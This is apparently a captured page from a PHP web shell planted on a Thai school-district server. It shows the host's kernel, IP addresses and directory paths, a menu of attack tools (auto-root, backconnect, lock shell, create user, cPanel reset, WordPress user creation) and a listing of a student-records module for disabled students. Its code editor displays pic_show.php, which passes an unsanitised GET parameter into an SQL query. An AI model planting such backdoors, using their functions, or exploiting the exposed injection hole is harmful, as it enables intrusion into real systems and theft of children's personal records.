Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
spacial_student /
[ HOME SHELL ]
Name
Size
Permission
Action
expand
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
manual
[ DIR ]
drwxr-xr-x
picture
[ DIR ]
drwxrwxrwx
default.php
491
B
-rwxr-xr-x
index.php
747
B
-rwxr-xr-x
livesearch.php
634
B
-rwxr-xr-x
livesearch_2.php
627
B
-rwxr-xr-x
menu.php
3.94
KB
-rwxr-xr-x
menu_mobile.php
944
B
-rwxr-xr-x
permission.php
8.48
KB
-rwxr-xr-x
permission_sch.php
9.69
KB
-rwxr-xr-x
permission_sch_khet.php
14.23
KB
-rwxr-xr-x
pic_show.php
1.86
KB
-rwxr-xr-x
pic_show2.php
780
B
-rwxr-xr-x
return_permission_sch_khet.php
1.31
KB
-rwxr-xr-x
student_khet_disable.php
44.99
KB
-rwxr-xr-x
student_sch_disable.php
55.4
KB
-rwxr-xr-x
student_sch_disable_report1.ph...
22.84
KB
-rwxr-xr-x
student_sch_disable_report1_mo...
11.2
KB
-rwxr-xr-x
student_sch_disable_report2.ph...
26.57
KB
-rwxr-xr-x
student_sch_disable_report3.ph...
4.99
KB
-rwxr-xr-x
student_sch_disable_report3_mo...
4.06
KB
-rwxr-xr-x
time_inc.php
4.8
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pic_show.php
<?php session_start(); if(!(isset($_SESSION['login_user_id']))){ exit(); } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> </head> <body> <?php require_once "../../amssplus_connect.php"; require_once "../../mainfile.php"; //ปีงบประมาณ $sql = "select * from student_main_edyear where year_active='1' order by ed_year desc limit 1"; $dbquery = mysqli_query($connect,$sql); $year_active_result = mysqli_fetch_array($dbquery); if($year_active_result['ed_year']==""){ echo "<br />"; echo "<div align='center'>ยังไม่ได้กำหนดทำงานในปีการศึกษาใด ๆ กรุณาไปที่เมนูตั้งค่าระบบ เพื่อกำหนดปีการศึกษา</div>"; exit(); } $sql_name = "select * from spacial_student_disabled left join student_main_main on spacial_student_disabled.person_id=student_main_main.person_id where spacial_student_disabled.person_id='$_GET[person_id]' and student_main_main.ed_year='$year_active_result[ed_year]'"; $dbquery_name = mysqli_query($connect,$sql_name); $result = mysqli_fetch_array($dbquery_name); $prename=$result['prename']; $name= $result['name']; $surname = $result['surname']; $pic = $result['pic']; $full_name="$prename$name $surname"; echo "<br>"; echo "<div align='center'><img src='../../$pic' border='0' width='400'></div>"; echo "<br>"; echo "<div align='center'>"; echo $full_name; echo "</div>"; ?> <br /> <CENTER><input border="0" src="images/button95.jpg" name="I1" width="100" height="20" type="image" onClick="javascript:window.close()"></CENTER> </body> </html>
Close